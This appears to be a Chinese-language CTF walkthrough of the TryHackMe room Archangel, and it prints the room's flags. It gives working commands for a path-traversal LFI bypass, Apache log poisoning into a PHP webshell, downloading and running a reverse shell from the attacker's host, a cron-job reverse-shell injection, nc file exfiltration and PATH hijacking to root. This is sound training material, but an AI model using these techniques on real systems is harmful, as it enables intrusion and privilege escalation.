[Day19] THM Archangel

URL : https://tryhackme.com/room/archangel
IP : 10.10.163.60

Recon

起手式，扫 Port rustscan -a 10.10.163.60
- 80 , 22
扫路径 python3 dirsearch.py -u http://10.10.163.60/ -e all
观察网页首页，发现里面有 /flag
- 点进去後 ......
- ㄍ......
  - 这个影片大约等於西方世界的统神端火锅QQ
- 用 curl 观察
  - 他会自动跳转到这边 https://www.youtube.com/watch?v=dQw4w9WgXcQ

Dfferent Hostname

题目提示 : Find a different hostname
- 可以观察 mafialive.thm
sudo vim /etc/hosts
- 加上这一行 10.10.163.60 mafialive.thm
- 接下来到 http://mafialive.thm/
- 就拿到了 flag
再扫一次路径python3 dirsearch.py -u http://mafialive.thm/ -e all
- http://mafialive.thm/robots.txt
  - /test.php
    - http://mafialive.thm/test.php

LFI

观察按下按钮後的网址
- http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php
- 感觉很明显可以 LFI
  - 尝试 Base64 Payload
```
  <!DOCTYPE HTML>
  <html>

  <head>
  	<title>INCLUDE</title>
  	<h1>Test Page. Not to be Deployed</h1>

  	</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
  		<?php

  			//FLAG: thm{explo1t1ng_lf1}

  			function containsStr($str, $substr) {
  				return strpos($str, $substr) !== false;
  			}
  			if(isset($_GET["view"])){
  			if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
  				include $_GET['view'];
  			}else{

  				echo 'Sorry, Thats not allowed';
  			}
  		}
  		?>
  	</div>
  </body>
```
    - 又捡到一个 flag thm{explo1t1ng_lf1}
    - 观察原始码发现，网址里不能出现 ../.. 且一定要出现 /var/www/html/development_testing
      - ../.. 可以用 .././.. 绕
    - 测试 curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd
    - 成功!!
来看 apache access log
- /var/log/apache2/access.log
- curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
- 成功 !!
- 往上拉发现所有的 host log 都在这边，所以可以直接针对 ip 来做 nc 写 php
  - nc 10.10.163.60 80
  - GET /?<?php phpinfo(); ?>
再回去看一次 access log
- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
- 成功出现 phpinfo !!
写入 webshell
- nc 10.10.163.60 80
- GET /<?php system($_GET[A]); ?>
  - http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&A=ls
下载 reverse shell
- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=wget 10.13.21.55:8000/s -O /tmp/s
  - 本地准备监听 nc -vlk 7877
  - 执行 shell http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=bash%20/tmp/s
  - 成功接上

Shell

使用 python 让 terminal 变漂亮
- python3 -c 'import pty; pty.spawn("/bin/bash")'
找 user flag
- thm{lf1_t0_rc3_1s_tr1cky}
找到使用者资料夹内有 passwordbackup
- ㄍ......再一次
- 等......等等，不会吧
- 该不会那个网址真 TM 是他的密码 ?__?
- - 好的，好险不是

提权

使用 Linpeas 扫
- wget 10.13.21.55:8000/linpeas.sh
- bash linpeas.sh
  - 找到一个可疑的 cron job
  - 发现这个 cron 会使用 archangel 来执行，而且我们对 /opt/helloworld.sh有读写权限
  - 写入 reverse shell
  - echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh
等待一分钟後，自动接上!!
- 找到 flag
  - thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}
观察使用者中的 secret 资料夹中
- 有一个 backup 档案有 suid
透过 nc 把档案传出来
- 监听端 nc -l -p 1234 > meow
- 发送端 nc 10.13.21.55 1234 < backup
哼!这种等级的 reverse，连 ida 都不用开，我们用 r2 就好ㄌ
- r2 meow
- aaa
- s main
- VV
- 可以看到他会用 system call 一个 cp
- 而 cp 没有写绝对路径，所以可以用 path 进行误导

PATH 欺骗

在家目录创一个 fakepath
- mkdir fakepath
- export PATH=/home/archangel/fakepath:$PATH
准备一个假的 cp 档案
- echo '#!/bin/bash' > cp
- echo "/bin/bash" >> cp
- chmod +x cp
执行 backup
- ./backup
取得 root 权限 !!
- - thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}